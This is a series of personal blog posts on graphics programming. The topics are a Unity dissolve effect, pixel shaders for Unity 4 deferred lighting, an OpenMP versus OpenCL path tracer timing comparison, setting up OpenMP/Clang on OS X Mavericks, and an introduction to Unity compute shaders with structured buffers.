   }
}
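
The timing logic is simple enough to model outside of Unity. The following Python sketch is an assumption-laden stand-in for the script above (the class and method names are made up, and the delta time is passed in by hand), but it shows how the value counts down and clamps at 0.

```python
class DissolveTimer:
    """Stand-in for the countdown in the dissolve script's Update function."""

    def __init__(self, time_scale=1.0):
        self.value = 1.0
        self.running = False
        self.time_scale = time_scale

    def trigger(self):
        # Restart from a fully intact mesh and begin counting down.
        self.value = 1.0
        self.running = True

    def update(self, delta_time):
        # Only count down once triggered, and never go below 0.
        if self.running:
            self.value = max(0.0, self.value - delta_time * self.time_scale)
        return self.value


timer = DissolveTimer(time_scale=2.0)
timer.trigger()
print(timer.update(0.25))
```

With a time scale of 1 the full dissolve takes one second; doubling the time scale halves that.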

With this, assuming that our shader is going to handle transforming the hit point into object space, all we need now is to cast a ray from the point on the screen where our mouse clicks and pass the hitpoint on our object’s collider to this script.

I’m going to handle this in a different script, so that we can put our dissolve script on multiple objects, but only cast 1 ray for all of them:

using UnityEngine;

public class TriggerDissolveOnClick : MonoBehaviour
{
   Vector3 point;
   bool didHit = false;
   DissolveEffect targetEffect;
   void Update ()
   {
      if (Input.GetMouseButton(0))
      {
         RaycastHit hitInfo;
         if (Physics.Raycast(Camera.main.ScreenPointToRay(Input.mousePosition),out hitInfo))
         {
            targetEffect = hitInfo.collider.gameObject.GetComponent<DissolveEffect>();
            if (targetEffect != null)
            {
               didHit = true;
               point = hitInfo.point;
               targetEffect.Reset();
            }
         }
      }
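      if (didHit && Input.GetMouseButtonUp(0))
      {
         // targetEffect is null if the last ray hit something without a DissolveEffect.
         if (targetEffect != null) targetEffect.TriggerDissolve(point);
         didHit = false; // require a fresh hit before the next trigger
      }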
   }
}

I attached the above script to my main camera (although it isn’t required as long as it’s somewhere in your scene). Once that’s all set up, you can put the DissolveEffect script on any object which uses our dissolve shader, and 1 click will give them the Marvin the Martian treatment:

Something to note: if your UVs aren’t set up to handle a seamless texture, you’re going to have a bad time. In cases where the actual texturing of the object requires UVs to be defined with discontinuities (so…pretty much all cases), you’re going to need to find another way to look up your noise texture. Since Unity 5 gives us access to 2 additional UV channels, I recommend trying UV3 or UV4, which will leave your UV2 channel available for lightmapping :)

The source for everything here (scripts and shaders) can be found on google drive here

If you have any questions about anything, spot a mistake, or just want to say hi, send me a message on twitter. Finally I’d like to say thanks to everyone who has emailed me corrections to previous posts, or in some cases code to keep things up to date with new versions of things. I’ll be updating those posts with everything that’s been sent in soon.

Happy shading!

Using Pixel Shaders with Deferred Lighting in Unity 4

2015-01-03T00:00:00+00:00

NOTE: This article is for an old version of Unity (Unity 4...sometime in 2015) and may not run / be useful for the latest version of unity

In a previous post (link), I talked about why surface shaders are a great way to write shaders for Unity’s Deferred Lighting rendering path, and they are.

But given the choice, I’d rather write pixel shaders. Surface shaders always felt a little too much like magic for me, and I’ll trade writing more lines of code for more control over what my gpu is doing any day of the week.

For forward rendering, writing pixel shaders is virtually no different from writing shaders for any other engine, however not much information is out there about writing pixel shaders that work with Unity’s deferred lighting system (and more maddeningly, there is no information in Unity’s docs), so this post is going to talk about that.

The shader we'll build in this article

Note that this article will not cover how to write custom lighting models for deferred lighting, but rather how to write shaders which use whatever lighting calculations are generated by the deferred lighting system.

I’m also on a Mac, and the shader compiler for OpenGL is way less picky than the one for DirectX, so if you hit any snags on Windows, send me a message on twitter and we’ll get things sorted out.

The Deferred Lighting Process

If you’re unfamiliar with what Deferred Lighting is, I recommend checking out my earlier post (link), where I go over the differences between deferred and forward rendering. As a quick refresher, Unity’s Deferred Lighting system is a 3 step process:

Step 1: Initial data buffers are constructed. These buffers consist of a depth buffer (Z-Buffer), and a buffer containing the specular power and normals of the objects visible to the camera (G-Buffer).

Step 2: the previously built buffers are combined to compute the lighting for each pixel on the screen.

Step 3: all of the objects are drawn again. This time, they are shaded with a combination of the computed lighting from step 2 and their surface properties (texture, colour, lighting function, etc).

When you write surface shaders, you don’t really need to worry about the nuts and bolts of this process, but since we’re using pixel shaders we’re directly responsible for the first and last steps. As such all pixel shaders that work with Deferred Lighting are 2 pass shaders (3 pass if you want to cast shadows).

Our Setup:

We’ll start building our shader with an empty pixel shader skeleton:

Shader "Specular-Deferred"
{
Properties {
	_MainTex ("Base (RGB)", 2D) = "white"{}
	_SpecColor ("Specular Color", Color) = (0.5,0.5,0.5,1)
 	_Shininess ("Shininess", Range(0.01,1)) = 0.078125
}
SubShader{
	Pass{
	}
	Pass{
	}
	Pass{
	}
}
}

Since we want our object to properly cast shadows, we need to write three passes. Note that if you only need your object to receive shadows, you can omit the third pass, since the shadow attenuation will already be factored into the light buffer that Unity builds during Step 2.

Pass 1: Getting Data Into the G Buffer

The first thing we need to do is make sure that the G-Buffer knows about our object’s shape and specularity so that it can properly calculate lighting for the scene. To do this, we need a pass that outputs the normals and specular values for our object.

To start, we need to let Unity know which pass to use to get this information. Just like with forward rendering, we’re going to use the LightMode tag to assign our passes different roles. In this case, we’ll use “PrePassBase.”

A lot of this pass is very straightforward, since for the most part all we’re doing is outputting normals, but since we also want our objects to be shiny, we need to set the alpha of our fragment shader’s output to our object’s shininess, like so:

Pass{
	Tags {"LightMode" = "PrePassBase"}
	CGPROGRAM
	#pragma vertex vert
	#pragma fragment frag		
	uniform float _Shininess;

	struct vIN
	{
		float4 vertex : POSITION;
		float3 normal : NORMAL;
	};
	struct vOUT
	{
		float4 pos : SV_POSITION;
		float3 wNorm : TEXCOORD0;
	};
	vOUT vert(vIN v)
	{
		vOUT o;
		o.pos = mul(UNITY_MATRIX_MVP, v.vertex);
		o.wNorm = mul((float3x3)_Object2World, v.normal);
		return o;
	}

	float4 frag(vOUT i) : COLOR
	{
		float3 norm = (i.wNorm * 0.5) + 0.5;
		return float4(norm, _Shininess);
	}
	ENDCG
}

If you’re a bit confused as to why this pass is necessary, think of Deferred Lighting as though it’s a shader replacement technique. In order to build the GBuffer, the camera renders all the objects in the scene using the PrePassBase pass, and saves this to a render texture. It then uses this data as part of the process of building the lighting buffer.

The line in the fragment function which halves the normal and then adds 0.5 to it just takes each component in the normal and re maps it from the range -1 to +1, to the range 0 to 1 so that it can be stored in a texture.
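
For a concrete feel for that remap, here is a tiny Python sketch. The encode function mirrors the line in the fragment function; the decode function is an assumption about what whoever reads the buffer back would do, and both names are made up for illustration.

```python
def encode_normal(n):
    """Remap each component from -1..1 to 0..1 so it fits in a texture."""
    return tuple(c * 0.5 + 0.5 for c in n)


def decode_normal(rgb):
    """Inverse remap, from 0..1 back to -1..1 (assumed reader side)."""
    return tuple(c * 2.0 - 1.0 for c in rgb)


# A normal pointing straight down +Z is stored as the familiar pale blue.
print(encode_normal((0.0, 0.0, 1.0)))
print(decode_normal(encode_normal((0.0, -1.0, 0.5))))
```

Without the remap, any negative component would be clamped to 0 by an unsigned texture format and half of the possible directions would be lost.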

Pass 2: Getting Data Out of the Light Buffer

Once that lighting buffer is created, our job changes from putting data into it, to getting data out of it.

Just like forward rendering, our second pass uses a different tag, PrePassFinal, to let Unity know to use this pass for the last step of the deferred rendering process. Otherwise, the first few lines of this pass are unremarkable.

Pass{
	Tags{"LightMode" = "PrePassFinal"}
	ZWrite off
	CGPROGRAM
	#pragma vertex vert
	#pragma fragment frag

	sampler2D _MainTex;
	uniform float4 _SpecColor;
	uniform sampler2D _LightBuffer;

	struct vIN
	{
		float4 vertex : POSITION;
		float2 texcoord : TEXCOORD0;
	};

	struct vOUT
	{
		float4 pos : SV_POSITION;
		float2 uv : TEXCOORD0;
		float4 uvProj : TEXCOORD1;
	};
}

The vert function is where things start getting interesting. The fragment function will sample the Light buffer using tex2Dproj, which takes a 4 component vector and divides the xy components by the w component.

Since what we need to do is sample the light buffer at the exact point on the screen that our fragment will be drawn, we have to set our 4 component uv vector to our fragment’s position in clip space. This will let tex2Dproj perform the perspective divide for us, letting us get at exactly the point on the light buffer that we need.

Or rather, that’s the easy way of looking at it. In truth it’s a bit messier than that. Let’s look at what our vertex function ends up being:

vOUT vert(vIN v)
{
	vOUT o;
	o.pos = mul(UNITY_MATRIX_MVP, v.vertex);
	
	float4 posHalf = o.pos * 0.5;
	posHalf.y *= _ProjectionParams.x;
	
	o.uvProj.xy = posHalf.xy + float2(posHalf.w, posHalf.w);
	o.uvProj.zw = o.pos.zw;
	o.uv = v.texcoord;
	
	return o;
}

To start with, we’re halving the clip space coordinates for our projected uvs. I’m assuming this is because the light buffer isn’t actually a screen size texture, but since there’s no information available about how Unity’s implementation works under the hood, it’s hard to know for sure.

You could try setting up a deferred lighting scene on an iOS device and using Xcode’s GPU frame capture to get at that data, but I don’t have any iOS devices in my apartment so I’ll leave that to you (send me a message on twitter if you actually try this :D ).

The Unity docs have this to say about _ProjectionParams:

“x is 1.0 (or –1.0 if currently rendering with a flipped projection matrix), y is the camera’s near plane, z is the camera’s far plane and w is 1/FarPlane.”

So it looks like all that multiplication is doing is making sure that we’re right side up on platforms where rendering to texture flips the image.

I have no idea why we end up adding the halved w component back to our xy components. Again, twitter me if you have any idea.
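
One reading that fits the math: after the divide by w, x and y sit in the range -1 to 1, while texture coordinates run from 0 to 1, so the usual remap is uv = 0.5 * (xy / w) + 0.5. If the divide is going to happen later inside tex2Dproj, the same remap can be stored pre-multiplied by w, which is exactly 0.5 * xy + 0.5 * w. It also appears to be the same arithmetic as Unity’s ComputeScreenPos helper. The Python sketch below checks that the two forms agree; the function names and sample values are made up, and the sign argument stands in for _ProjectionParams.x.

```python
def projected_uv(clip_x, clip_y, clip_w, projection_sign=1.0):
    """What the vertex function stores, followed by tex2Dproj's divide by w."""
    half_x = clip_x * 0.5
    half_y = clip_y * 0.5 * projection_sign
    half_w = clip_w * 0.5
    return ((half_x + half_w) / clip_w, (half_y + half_w) / clip_w)


def remapped_ndc(clip_x, clip_y, clip_w, projection_sign=1.0):
    """Divide first, then remap -1..1 to 0..1 directly."""
    return (clip_x / clip_w * 0.5 + 0.5,
            clip_y * projection_sign / clip_w * 0.5 + 0.5)


print(projected_uv(1.0, -2.0, 4.0))
print(remapped_ndc(1.0, -2.0, 4.0))
```

Doing the divide per fragment instead of per vertex matters because uv / w does not interpolate linearly across a triangle, while uv and w on their own do.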

But now that that’s covered, our fragment function is really straightforward:

float4 frag(vOUT i) : COLOR
{
	float4 light = tex2Dproj(_LightBuffer, i.uvProj);
	float4 logLight = -(log2(max(light, float4(0.001,0.001,0.001,0.001))));
	float4 texCol = tex2D(_MainTex, i.uv);
	return float4((texCol.xyz * logLight.xyz) + float3(_SpecColor.xyz) * logLight.w, texCol.w);
}

Notice how unlike forward rendering, we don’t have to do any per light calculations, because they’ve already been done for us, and had the resulting value stored in the light buffer. All we have to do is read from that buffer and multiply our fragment colour accordingly. Just like in the first pass, specular values are stored on the alpha channel of the light buffer.

The logLight calculation feels to me like an implementation specific detail that we don’t really need to worry about, except to know that we have to do it to get values that make sense from Unity. I haven’t built any deferred lighting systems from scratch, so I’m not sure if this is a standard way of storing data in a light buffer or not.
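
As a rough illustration of why a log would show up here, the Python sketch below assumes that the light buffer stores 2 raised to the power of minus the light value, so that a low precision texture can hold a wider range of brightness. That encoding is an assumption for the sake of the example, not something confirmed in this post; only the decode function mirrors the shader line above, and both function names are made up.

```python
import math


def encode_light(value):
    """Assumed encoding: brighter light is stored as a smaller number."""
    return 2.0 ** -value


def decode_light(stored):
    """Mirror of the shader line: -log2(max(stored, 0.001))."""
    return -math.log2(max(stored, 0.001))


# Round trip a light value that would not fit in a 0..1 texture directly.
print(decode_light(encode_light(3.0)))
# The clamp keeps log2 away from 0 and caps the decoded value.
print(decode_light(0.0))
```

Under that assumption, the clamp to 0.001 puts a ceiling of just under 10 on the decoded light value.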

But nevertheless, you should now have a working pixel shader with deferred lighting. How exciting! Only one pass left to go.

Pass 3: Casting Shadows

One of the cooler parts of Deferred Rendering is getting to have point lights cast shadows, but to do that we’ll need another pass. Luckily, this pass is the same as any other shadow caster pass in Unity. In theory you could let a fallback handle this for you, but for the sake of having a fully standalone shader, let’s add it here as well.

Pass {
	Name "ShadowCaster"
	Tags { "LightMode" = "ShadowCaster" }
	
	Fog {Mode Off}
	ZWrite On ZTest LEqual Cull Off
	Offset 1, 1

	CGPROGRAM
	#pragma vertex vert
	#pragma fragment frag
	#pragma multi_compile_shadowcaster
	#include "UnityCG.cginc"

	struct v2f { 
		V2F_SHADOW_CASTER;
	};

	v2f vert( appdata_base v )
	{
		v2f o;
		TRANSFER_SHADOW_CASTER(o)
		return o;
	}

	float4 frag( v2f i ) : SV_Target
	{
		SHADOW_CASTER_FRAGMENT(i)
	}
	ENDCG
}

Conclusion

If everything has gone according to plan, you should now have a pixel shader that works with deferred lighting and shadows! If you don’t see your object at all, make sure that you’ve actually switched your camera over to the deferred path (I made that mistake when writing this post).

It’s worth noting that all I did to figure this out was to write surface shaders that only used the deferred lighting path, have them compile down to glsl and figure out what was going on from the compiled shaders.

If you want to learn more (like how to add spherical harmonic lights, or use lightmaps), all you need to do in order to do this yourself is add “exclude_path:forward” to your surface pragma, and add an additional pragma below that, like this:

#pragma surface surf BlinnPhong exclude_path:forward
#pragma only_renderers gles

If you’re on desktop, you’ll need to click the “Show All” button in the inspector to get at the gles code, since gles shaders are meant for mobile devices. If you can read ARB or DirectX assembly, you can do that too, but I find glsl much more readable.

notice the "Show All" button

If you have any questions about anything, spot a mistake, or just want to say hi, send me a message on twitter. Happy Shading!

OpenMP vs OpenCL - An Unfair Comparison

2014-10-25T00:00:00+00:00

In the wake of my last post, I decided to get started with my path tracing project by building a small proof of concept renderer to get my feet wet both with the path tracing algorithm and with OpenMP. I was pretty happy with the output of the path tracer (shown below), but I wasn’t happy with the speed I was getting. Since this project’s entire goal is to entertain me, having to wait minutes to see how a code change impacts the output image is a major buzzkill.

So I decided to ask (myself) a really stupid question: would this be faster on the GPU?

And because the answer for that was pretty obvious (yes!), I then asked a slightly less stupid question: how much faster?

To answer that, I wrote a second version of the path tracer using OpenCL and ran both of them with the time command. It goes without saying that the code bases were so different that this comparison isn’t exactly fair, but I’ve always wanted to put a graph in a blog post, so here one is!

It’s hard to see on the graph, but the OpenCL renderer only barely cracked a minute in running time on the 1024 samples per pixel run. OpenMP started at a minute and a half for the 64 samples per pixel case. There are obviously other things that impact which API will be the best for your use case, but iteration speed is pretty important to me, and it’s how I’m deciding which API I’m using for this project. Waiting makes you a waiter.

If you’re interested, the code for both path tracers can be found on github: OpenMP or OpenCL. If you can see anything in the OpenMP source that could be changed to make it 20x faster (which would almost catch up to OpenCL), please let me know! Until then, it looks like I’m abandoning OpenMP for this project.

As always, I’m on twitter if you want to say hi :D Happy Coding!

Setting Up OpenMP on Mavericks

2014-07-15T00:00:00+00:00

NOTE: This article is from 2014 and will not be updated. It may or may not still be valid

If you’ve ever worked with me (or talked with me for more than a half hour) it’s not a secret that I’m completely fascinated with ray and path tracers. My last project was building a relatively simple ray tracer, so I think it’s time to build a path tracer.

The Blender monkey rendered in my first ray tracer

I’ve tinkered with a few open source path tracers out there, but the one that caught my eye originally was SmallPT, which uses OpenMP. OpenMP is an API, maintained by a consortium of hardware and software vendors, that makes it dead simple to write parallel code. Want to have a for loop distribute itself over multiple cores? That looks like this:

#include <stdio.h>
#include <omp.h>

int main(void)
{
	#pragma omp parallel for
	for (int i = 0; i < 100; i++)
		printf("Loop executed on thread %d\n", omp_get_thread_num());
}

After working with Boost’s Thread library on the ray tracer, which ended up dictating a lot of the structure of the renderer, OpenMP seems like a great way to let the compiler/runtime handle the implementation of the threading code and let me focus on actually building something cool.

So with that in mind, today’s article is all about how to set up OpenMP on Mavericks and get it working with a Makefile in Xcode 5; it’s a heck of a lot more involved than I originally anticipated. I suppose one caveat of this post is that most of the information here is taken from other places (which I’ve linked to), I’m just collecting it all in one place for the next person who wants to do this.

Extreme Yak Shaving

The first step to getting OpenMP up and running on Mavericks is to install a new compiler. No joke. The version of Clang installed on your system doesn’t support OpenMP, and Apple very quietly replaced gcc with a symlink to Clang with Xcode 5, so we’re starting this process up a bit of a creek.

There are 2 commonly recommended options at this point. Probably the most logical solution is to simply install GCC 4.9 using Homebrew or MacPorts (or build it yourself if that turns your crank), but the Homebrew recipe for GCC 4.9 was broken at the time of writing this, and while I was looking for how to grab it from MacPorts I came across OpenMP®/Clang.

OpenMP®/Clang, unsurprisingly, is a modified version of Clang which supports OpenMP. Given that I’m already used to using Clang this seemed like a great idea, especially since the website is active, and indicates that the plan is to eventually contribute to the Clang trunk. May as well jump on the bandwagon early.

Installing OpenMP®/Clang

This part is tricky, but luckily StackOverflow has our back. If you check out this post you can find a script that user Jason Parham wrote for automating the process of installing / configuring the tools we need (namely OpenMP®/Clang, and the OpenMP® runtime itself). I modified the paths that everything got built to, but otherwise the steps I took mimic that script almost exactly.

One thing to pay attention to is that the script above will bind the new version of clang to the commands “clang2” and “clang2++,” which is great because it means we don’t have to screw with the moderately important command currently bound to “clang.”

Aside from that though, that script should take care of a lot of the heavy lifting needed to get us going.

Clang2 and Xcode

If you’re happy just using Makefiles by themselves you can actually just stop here and use them to build your projects (remembering to use the -fopenmp flag), but I still wanted to use Xcode as a front end for the LLVM debugger so my odyssey continued for a bit. If that sounds like something you want too, the rest of this article will outline how to get that working.

Setting up a makefile based project in Xcode is (relatively) straightforward:

Create a new project like normal, choosing whatever template makes sense.
Go to your project settings and delete the pre-generated target(s) for your application
Create a new target of type “External Build System”
Create a makefile for your project and put it somewhere in your project directory
In your Build Tool Configuration page, set the directory to wherever you’ve chosen to store your makefile, and set the arguments to “-f NAME_OF_YOUR_MAKEFILE”

If you’ve followed those steps, your Build Tool Configuration page should look something like the following:

Great. Next up is to actually write the makefile. For the most part this is the same as any other makefile, except that you need to specify “clang2” as the compiler, and include the -fopenmp flag when you compile files that include OpenMP. A really simple makefile that does this might look like the following:

We’re almost there, but XCode isn’t through with us yet. If you try to build now, you’ll notice that it fails spectacularly and spits out a cryptic error that boils down to not knowing what the heck “clang2” is. This is because for some reason XCode doesn’t read the PATH variables that we set up in that script earlier, so we need to tell it where to find our compiler.

I’m sure there’s a better way of doing this, but after a couple of hours of banging my head against a wall, I’ve resigned myself to launching XCode from the command line like so:

$ source ~/.profile
$ open -a "Xcode"

This will open XCode with the path variables we need set up properly. If you like Spotlight as much as I do, I recommend wrapping these in an Automator application so you can run these commands from there.

If you build from the XCode that was opened from the command line, you should finally be able to run your program. If you’re looking for a good test, I recommend the example found on clang-omp.github.io. If OpenMP is running correctly, you should be able to see the printf statement get executed from multiple threads when that file is run.

Normally this is where I tell you to contact me with any questions, but I fear that I’m as in the dark about this as you are right now, although hopefully that changes over the next few weeks. In any case, you can get a hold of me on twitter if you want to say hi. Happy Coding!

Getting Started With Compute Shaders In Unity

2014-06-27T00:00:00+00:00

NOTE: This article is for an old version of Unity (Unity 4...sometime in 2014) and probably won't run anymore, but the basic idea is still valid. I just don't want to spend time updating old posts every time Unity increments a version number

I love the simplicity of vert/frag shaders; they only do one thing (push verts and colors to the screen), and they do it exceptionally well, but sometimes, that simplicity feels limiting and you find yourself staring at a loop of matrix calculations happening on your CPU trying desperately to figure out how you could store them in a texture…

…Or maybe that’s just me, but regardless, compute shaders solve that problem, and it turns out that they’re dead simple to use, so I’m going to explain the basics of them today. First I’ll go through the example compute shader that unity auto creates for you, and then I’ll finish off with an example of a compute shader working with a structured buffer of data.

Compute shaders can be used to control the positions of particles

What the Heck is a Compute Shader?

Simply put, a compute shader is a program executed on the GPU that doesn’t need to operate on mesh or texture data, works inside the OpenGL or DirectX memory space (unlike OpenCL which has its own memory space), and can output buffers of data or textures and share memory across threads of execution.

Right now Unity only supports DirectX11 compute shaders, but once everyone catches up to OpenGL 4.3, hopefully us mac lovers will get them too :D

This means that this will be my first ever WINDOWS ONLY tutorial. So if you don’t have access to a windows machine, the rest of this probably won’t be helpful.

What are they good for? (and what do they suck at?)

Two words: math and parallelization. Any problem which involves applying the same (no conditional branching) set of calculations to every element in a data set is perfect. The larger the set of calculations, the more you’ll reap the rewards of doing things on your GPU.

Conditional branching really kills your performance because GPUs aren’t optimized to do that, but this is no different from writing vertex and fragment shaders so if you have some experience with them this will be old hat.

There’s also the issue of latency. Getting memory from the GPU back to your CPU takes time, and will likely be your bottleneck when working with compute shaders. This can be somewhat mitigated by ensuring that you optimize your kernels to work on the smallest buffers possible but it will never be totally avoided.

Got it? Good. Let's get started.

Since we’re working with DirectX, Unity’s compute shaders need to be written in HLSL, but it’s pretty much indistinguishable from the other shader languages so if you can write Cg or GLSL you’ll be fine (this was my first time writing HLSL too).

The first thing you need to do is create a new compute shader. Unity’s project panel already has an option for this, so this step is easy. If you open up that file, you’ll see the following auto generated code (I’ve removed the comments for brevity):

#pragma kernel CSMain

RWTexture2D<float4> Result;

[numthreads(8,8,1)]
void CSMain (uint3 id : SV_DispatchThreadID)
{
    Result[id.xy] = float4(id.x & id.y, (id.x & 15)/15.0, (id.y & 15)/15.0, 0.0);
}

This is a really good place to start figuring out compute shaders, so let’s go through it line by line:

#pragma kernel CSMain

This specifies the entry point to the program (essentially the compute shader’s “main”). A single compute shader file can have a number of these functions defined, and you can call whichever one you need from script.

RWTexture2D<float4> Result;

This declares a variable that contains data the shader program will work with. Since we aren’t working with mesh data, you have to explicitly declare what data your compute shader will read and write to. The “RW” in front of the datatype specifies that the shader will both read and write to that variable.

[numthreads(8,8,1)]

This line specifies the dimensions of the thread groups being spawned by our compute shader. Compute shaders take advantage of the massively parallel processing power of the GPU by creating threads that run simultaneously. Thread groups specify how to organize these spawned threads. In the code above, we are specifying that we want each group of threads to contain 64 threads (8 × 8 × 1), which can be accessed like a 2D array.

Determining the optimum size of your thread groups is a complicated issue, and is largely related to your target hardware. In general, think of your gpu as a collection of stream processors, each of which is capable of executing X threads simultaneously. Each processor runs 1 thread group at a time, so ideally you want your thread group to contain X threads to take best advantage of the processor. I’m still at the point where I’m playing with these values to really get a handle on them, so rather than dispense advice on how best to set these values, I’ll leave it up to you to google (and then share on twitter :D ).

The rest of the shader is pretty much regular code. The kernel function determines what pixel it should be working on based on the id of the thread running the function, and writes some data to the Result buffer. Easy right?
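To make the per-pixel logic concrete, here is a rough CPU-side sketch in Python of what that one line of the kernel computes for a given thread id. It is only an illustration of the arithmetic; the function name cs_main is made up for this sketch, and it ignores anything the texture format might do to the values once they are written.

```python
def cs_main(x, y):
    """Colour the auto-generated CSMain kernel computes for pixel (x, y)."""
    r = float(x & y)     # bitwise AND of the two coordinates
    g = (x & 15) / 15.0  # ramps from 0 to 1 every 16 pixels across
    b = (y & 15) / 15.0  # ramps from 0 to 1 every 16 pixels down
    return (r, g, b, 0.0)


print(cs_main(0, 0))
print(cs_main(15, 15))
print(cs_main(16, 3))
```

The green and blue channels repeat every 16 pixels, while the red channel depends on which bits the two coordinates share.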

Actually Running The Shader

Obviously we can’t attach a compute shader to a mesh and expect it to run, especially since it isn’t working with mesh data. Compute shaders actually need to be set up and called from scripts, which looks like this:

public ComputeShader shader;

void RunShader()
{
int kernelHandle = shader.FindKernel("CSMain");

RenderTexture tex = new RenderTexture(256,256,24);
tex.enableRandomWrite = true;
tex.Create();

shader.SetTexture(kernelHandle, "Result", tex);
shader.Dispatch(kernelHandle, 256/8, 256/8, 1);
}

There are a few things to note here. First is setting the enableRandomWrite flag of your render texture BEFORE you create it. This gives your compute shaders access to write to the texture. If you don’t set this flag you won’t be able to use the texture as a write target for the shader.

Next we need a way to identify what function we want to call in our compute shader. The FindKernel function takes a string name, which corresponds to one of the kernel names we set up at the beginning of our compute shader. Remember, a Compute Shader can have multiple kernels (functions) in a single file.

The ComputeShader.SetTexture call lets us move the data we want to work with from CPU memory to GPU memory. Moving data between memory spaces is what will introduce latency to your program, and the amount of slowdown you see is proportional to the amount of data that you are transferring. For this reason, if you plan on running a compute shader every frame you’ll need to aggressively optimize how much data actually gets operated on.

The three integers passed to the Dispatch call specify the number of thread groups we want to spawn. Recall that each thread group’s size is specified in the numthreads block of the compute shader, so in the above example, the number of total threads we’re spawning is as follows:

32*32 thread groups * 64 threads per group = 65536 threads total.

This ends up equating to 1 thread per pixel in the render texture, which makes sense given that the kernel function can only operate on 1 pixel per call.
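If you want to convince yourself of that thread count, the following Python sketch enumerates every thread id the Dispatch call would produce, using the rule that a thread’s SV_DispatchThreadID is its group index times the group size plus its index inside the group. The helper name dispatch_thread_ids is invented for this example; nothing here touches Unity.

```python
from itertools import product

NUM_THREADS = (8, 8, 1)           # from [numthreads(8,8,1)] in the shader
GROUPS = (256 // 8, 256 // 8, 1)  # the three integers passed to Dispatch


def dispatch_thread_ids(groups, num_threads):
    """Yield the (x, y, z) SV_DispatchThreadID of every thread that gets launched."""
    for gx, gy, gz in product(*(range(g) for g in groups)):
        for tx, ty, tz in product(*(range(t) for t in num_threads)):
            yield (gx * num_threads[0] + tx,
                   gy * num_threads[1] + ty,
                   gz * num_threads[2] + tz)


ids = list(dispatch_thread_ids(GROUPS, NUM_THREADS))
pixels = {(x, y) for x, y, _ in ids}

print(len(ids))     # total threads launched
print(len(pixels))  # distinct pixels covered
```

Both numbers come out the same, which is another way of saying that every pixel of the 256x256 texture gets exactly one thread.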

So now that we know how to write a compute shader that can operate on texture memory, let’s see what else we can get these things to do.

Structured Buffers Are Freaking Sweet

Modifying texture data is a bit too much like vert/frag shaders for me to get too excited; it’s time to unshackle our GPU and get it working on arbitrary data. Yes it’s possible, and it’s as awesome as it sounds.

A structured buffer is just an array of data consisting of a single data type. You can make a structured buffer of floats, or one of integers, but not one of floats and integers. You declare a structured buffer in a compute shader like this:

StructuredBuffer<float> floatBuffer;
RWStructuredBuffer<int> readWriteIntBuffer;

What makes these buffers more interesting though, is the ability for that data type to be a struct, which is what we’ll do for the second (and last) example in this article.

For our example, we’re going to be passing our compute shader a set of points, each of which has a matrix that we want to transform it by. We could accomplish this with 2 separate buffers (one of Vector3s and one of Matrix4x4s), but it’s easier to conceptualize a point/matrix pair if they’re together in a struct, so let’s do that.

In our c# script, we’ll define the data type as follows:

struct VecMatPair
{
public Vector3 point;
public Matrix4x4 matrix;
}

We also need to define this data type inside our shader, but HLSL doesn’t have a Matrix4x4 or Vector3 type. However, it does have data types which map to the same memory layout. Our shader might end up looking like this:

#pragma kernel Multiply

struct VecMatPair
{
	float3 pos;
	float4x4 mat;
};

RWStructuredBuffer<VecMatPair> dataBuffer;

[numthreads(16,1,1)]
void Multiply (uint3 id : SV_DispatchThreadID)
{
    dataBuffer[id.x].pos = mul(dataBuffer[id.x].mat,
    				float4(dataBuffer[id.x].pos, 1.0)).xyz;
}

Notice that our thread group is now organized as a 1 dimensional array. There is no performance impact regarding the dimensionality of the thread group, so you’re free to choose whatever makes the most sense for your program.
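For checking results on the CPU, the math the Multiply kernel performs on each element can be sketched in Python as below. This is a plain reference version under a couple of assumptions: the matrix is given as four rows of four floats, the point is treated as a column vector with w = 1, and the helper name multiply is made up for the sketch. It says nothing about how Unity or HLSL lay the matrix out in memory.

```python
def multiply(mat, pos):
    """Transform the point pos = (x, y, z) by the 4x4 matrix mat (a list of rows)."""
    v = (pos[0], pos[1], pos[2], 1.0)  # promote to a float4 with w = 1
    out = [sum(mat[r][c] * v[c] for c in range(4)) for r in range(4)]
    return tuple(out[:3])              # keep x, y, z and drop w


# A translation by (2, 3, 4), used purely as test data.
translate = [
    [1.0, 0.0, 0.0, 2.0],
    [0.0, 1.0, 0.0, 3.0],
    [0.0, 0.0, 1.0, 4.0],
    [0.0, 0.0, 0.0, 1.0],
]

print(multiply(translate, (1.0, 1.0, 1.0)))
```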

Setting up a structured buffer in a script is a bit different from the texture example we did earlier. For a buffer, you need to specify how many bytes a single element in the buffer is, and store that information along with the data itself inside a compute buffer object. For our example struct, the size in bytes is simply the number of float values we are storing (3 for the vector, 16 for the matrix) multiplied by the size of a float (4 bytes), for a total of 76 bytes in a struct. Setting this up in a compute buffer looks like this:

public ComputeShader shader;

void RunShader()
{
	VecMatPair[] data = new VecMatPair[5];
	//INITIALIZE DATA HERE

	ComputeBuffer buffer = new ComputeBuffer(data.Length, 76);
	buffer.SetData(data);
	int kernel = shader.FindKernel("Multiply");
	shader.SetBuffer(kernel, "dataBuffer", buffer);
	shader.Dispatch(kernel, data.Length, 1,1);
}
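The 76 passed to the ComputeBuffer constructor is the stride arithmetic described above. A quick way to double check that kind of number is to let Python’s struct module do the counting; the constant names here are just for illustration.

```python
import struct

FLOATS_IN_VECTOR3 = 3
FLOATS_IN_MATRIX4X4 = 16
BYTES_PER_FLOAT = struct.calcsize("<f")  # size of one 32-bit float

stride = (FLOATS_IN_VECTOR3 + FLOATS_IN_MATRIX4X4) * BYTES_PER_FLOAT

# Packing 19 floats back to back should take the same number of bytes.
packed = struct.pack("<19f", *([0.0] * 19))

print(stride, len(packed))
```

If you add or remove fields from the struct, the stride has to change with it, so it can be worth computing it rather than hard coding it.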

Now we need to get this modified data back into a format that we can use in our script. Unlike the example above with a render texture, structured buffers need to explicitly be transferred from the GPU’s memory space back to the CPU. In my experience, this is the spot where you’ll notice the biggest performance hit when using compute shaders, and the only ways I’ve found to mitigate it are to optimize your buffers so that they’re as small as possible while still being useable and to only pull data out of your shader when you absolutely need it.

The code to get the data back to the cpu is really simple. All you need is an array of the same data type and size as the buffer’s data to write to. If we modified the above script to write the resulting data back to a second array, it might look like this:

public ComputeShader shader;

void RunShader()
{
VecMatPair[] data = new VecMatPair[5];
VecMatPair[] output = new VecMatPair[5];

//INITIALIZE DATA HERE

ComputeBuffer buffer = new ComputeBuffer(data.Length, 76);
buffer.SetData(data);
int kernel = shader.FindKernel("Multiply");
shader.SetBuffer(kernel, "dataBuffer", buffer);
shader.Dispatch(kernel, data.Length, 1,1);
buffer.GetData(output);
}

